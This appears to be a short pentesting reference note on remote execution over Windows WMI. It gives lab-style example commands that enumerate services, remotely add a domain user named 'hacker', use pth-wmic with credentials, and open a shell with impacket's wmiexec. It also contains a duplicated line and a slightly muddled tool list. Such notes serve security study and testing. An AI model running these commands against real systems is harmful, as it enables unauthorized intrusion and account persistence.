Backlink: reference-notes-readme
WMI is Microsoft's consolidation of system management under a single umbrella. It is leveraged heavily under the hood for local operation, but can also be used for remote execution. Several built-in tools exist for either WQL query execution, or full code execution. Impacket includes wmiexec which also provides a semi-interactive shell. Remote WMI queries used RPC/DCOM as the communication bus.
Port: 135/TCP (RPC), plus one high-random TCP (DCOM)
Tools: winrm, winrs, PowerShell Remoting
Examples
List Services:
wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 service get "startname,pathname"
Execute Code (Add User):
wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 process call create "net user hacker Str0nGP_$sw0rd /add /domain"
List Services (via PS cmdlet):
Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"
List Processes (via Linux wmic util):
pth-wmic -U testlab/josh%Password1 //192.168.112.200 "select csname,name,processid,sessionid from win32_process"
Semi-interactive Shell (impacket):
wmiexec.py 'josh':'Password1'@192.168.112.200